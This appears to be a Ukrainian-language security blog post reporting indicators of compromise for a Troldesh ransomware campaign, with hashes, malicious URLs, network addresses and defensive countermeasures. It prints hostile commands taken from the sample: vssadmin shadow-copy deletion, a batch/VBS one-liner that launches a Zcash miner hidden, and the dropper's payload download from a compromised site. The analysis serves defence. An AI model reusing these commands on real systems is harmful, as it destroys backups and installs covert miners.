IOC_Ransom_troldesh_050917

Доброго дня, панове.

За даними @malwrhunterteam Вчора було зафіксовано спробу доставки Ransomware типу TorrentLocker (shade/troldesh,).

ransomnote_filename: READMExx.txt

ransomnote_email: VladimirScherbinin1991[@]gmail.com

ransomnote_url: h11p://cryptsen7fo43rr6.onion.cab/

encrypted files are <base64>.<ID>.crypted000007

Доставка через JS скрипт (Nemucod) і завантаження основного тіла через WScript.

Доставку забезпечує скомпрометований сайт h11p://contrast.com.ua (194.24.182.138)

Сайт містить обидві частини – dropper та payload:

Важливо – станом на 12:30 файли досі доступні, судячи з дати модифікації були опубліковані ще 5/09/17.

Рівень загрози – середній.

Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що компоненти Adwind детектуються DAT & GTI.

Схема атаки:

email > attach (ZIP) > JS >  WScript > URL > GET > AppData\Roaming\Microsoft\WIndows\Templates\%random%.exe

або

email > URL > GET > ZIP > JS >  WScript > URL > GET > AppData\Roaming\Microsoft\WIndows\Templates\%random%.exe

Маркери IOC:

File Name ✉ запрашиваемая Вами форма.js
SHA-256 Hash Identifier C3A4433120AB94AC0619670247A0D41B2051E2B9EA897884C323F62ABC872000
File Size 49240 bytes
File Type ASCII text

Запуск скрипта-приманки ініціює завантаження основного тіла:

194.24.182.138 80 HTTP contrast.com.ua GET /images/donckihot.jpg

Основне тіло являє собою додаток із розширенням .jpg

File Name donckihot.jpg
SHA-256 Hash Identifier 9B6667E567A5D2B86082EC3048A2F08D8F081F09049B2F2A932CFD803EDBC063
File Size 1027072 bytes

Яке записується та стартує із каталогу

%Username%\AppData\Roaming\Microsoft\Windows\Templates\%random%.exe

Копіює своє тіло у c:\programdata\windows\csrss.exe

Зразок проводить перевірку наявності та видалення існуючих тіньових копій:

C:\Windows\system32\vssadmin.exe List Shadows 
C:\Windows\system32\vssadmin.exe Delete Shadows /All /Quiet

Додає себе у автозавантаження

HCU\SOFTWARE\MS\Windows\CurrentVersion\Run\Client Server Runtime Subsystem c:\programdata\windows\csrss.exe

Ініціює зміну кодової сторінки

C:\Windows\system32\cmd.exe > chcp

Завантажує додатковий модуль у %tmp% та запускає його

“C:\tmp\749406EA.exe”

File Name 749406EA.exe
SHA-256 Hash Identifier CAAFBAC10D50D12F8852A9FD22DA3EA468C5658DBBEA61827EE6D6AEF7AF3D65
File Size 12407808 bytes

Який у свою чергу паралельно з процесом шифрування запускає на системі Bitcoin miner

File Name nheqminer.exe
SHA-256 Hash Identifier 8787D5D5E0C52183B60769DCA03087593870356AF632ADCABFFC2ACDFADBBD3A
File Size 643072 bytes
C:\PROGRA~3\SOFTWA~1\NHEQMI~1.EXE  -l eu1-zcash.flypool.org:3333 -u t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.4C6A1A4F -t 1

Для закріплення майнера при перезавантаженні в автозапуск додається bat:

HCU\SOFTWARE\MS\Windows\CurrentVersion\Run\Command Line Support c:\programdata\syswow64\qw84q.cmd

Зміст bat файлу:

echo CreateObject("Wscript.Shell").Run "" ^& WScript.Arguments(0) ^& "", 0, False > "%TEMP%/JQZ3Cw.vbs" && start /WAIT wscript.exe "%TEMP%/JQZ3Cw.vbs" "C:\PROGRA~3\SOFTWA~1\NHEQMI~1.EXE -l eu1-zcash.flypool.org:3333 -u t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.4C6A1A4F -t 1" && del "%TEMP%\JQZ3Cw.vbs"

Після шифрування мережева активність скомпрометованої системи виглядає так:

645030.exe 200 TCP 127.0.0.1 49215 127.0.0.1 49216 ESTABLISHED 
645030.exe 200 TCP 127.0.0.1 49216 127.0.0.1 49215 ESTABLISHED
645030.exe 200 TCP 10.0.2.15 49230 194.109.206.212 443 ESTABLISHED
645030.exe 200 TCP 10.0.2.15 49231 171.25.193.9 80 CLOSE_WAIT
645030.exe 200 TCP 10.0.2.15 49232 192.42.115.102 9004 ESTABLISHED
645030.exe 200 TCP 10.0.2.15 49233 62.210.244.146 9001 ESTABLISHED
645030.exe 200 TCP 10.0.2.15 49234 89.163.224.70 9001 ESTABLISHED
749406EA.exe 2772 TCP 127.0.0.1 49254 127.0.0.1 49255 ESTABLISHED
749406EA.exe 2772 TCP 127.0.0.1 49255 127.0.0.1 49254 ESTABLISHED
749406EA.exe 2772 TCP 10.0.2.15 49257 208.83.223.34 80 ESTABLISHED
749406EA.exe 2772 TCP 10.0.2.15 49258 193.23.244.244 443 ESTABLISHED
749406EA.exe 2772 TCP 10.0.2.15 49259 85.214.62.48 443 ESTABLISHED
749406EA.exe 2772 TCP 10.0.2.15 49260 51.15.48.254 443 ESTABLISHED
749406EA.exe 2772 TCP 10.0.2.15 49261 92.62.46.190 443 ESTABLISHED
749406EA.exe 2772 TCP 127.0.0.1 49262 127.0.0.1 62779 ESTABLISHED
749406EA.exe 2772 TCP 127.0.0.1 62779 127.0.0.1 49262 ESTABLISHED
NHEQMI~1.EXE 224 TCP 10.0.2.15 49256 94.23.20.210 3333 ESTABLISHED

Що можна було зробити аби уникнути шифрування ?

  1. Завантаження архіву з скриптом можна було завадити через блокування JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис JS приманки на диск (розпаковку) можна було попередити заборонивши створення JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення .tmp та .exe файлів у каталозі профілю та %tmp% якщо не стандартний шлях (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

194.24.182.138 80 HTTP contrast.com.ua GET /images/donckihot.jpg
194.109.206.212:443
171.25.193.9:80
192.42.115.102:9004
62.210.244.146:9001
89.163.224.70:9001
208.83.223.34:80
193.23.244.244:443
85.214.62.48:443
51.15.48.254:443
92.62.46.190:443
94.23.20.210:3333

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR
Advertisements

Tags: , , , , , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: